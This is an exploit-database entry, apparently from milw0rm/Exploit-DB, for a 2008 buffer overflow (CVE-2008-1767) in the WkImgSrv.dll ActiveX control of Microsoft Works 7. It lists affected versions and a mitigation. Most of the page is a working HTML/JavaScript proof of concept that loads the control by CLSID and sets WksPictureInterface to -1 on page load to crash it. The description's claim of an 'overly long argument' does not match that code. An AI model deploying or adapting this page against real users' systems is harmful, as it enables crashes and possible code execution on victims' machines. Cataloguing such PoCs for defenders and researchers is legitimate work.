header-logo
Suggest Exploit
vendor:
Microsoft Works
by:
milw0rm.com
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Microsoft Works
Affected Version From: 7.0.0.90
Affected Version To: 7.0.2.90
Patch Exists: YES
Related CWE: CVE-2008-1767
CPE: a:microsoft:works
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Microsoft Works 7 WkImgSrv.dll crash POC

This proof-of-concept code exploits a buffer overflow vulnerability in Microsoft Works 7. The vulnerability is caused due to a boundary error in the WkImgSrv.dll module when handling a specially crafted HTML file. This can be exploited to cause a stack-based buffer overflow via an overly long argument passed to the WksPictureInterface property of the WkImgSrv.dll ActiveX control. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to Microsoft Works 7.0.2.90 or later.
Source

Exploit-DB raw data:

<html>
<head>
  <title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
  <script language="JavaScript">
    function payload() {
var num = -1;
obj.WksPictureInterface = num;
  }
   </script>
</head>
 <body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
 </body>
</html>

# milw0rm.com [2008-04-17]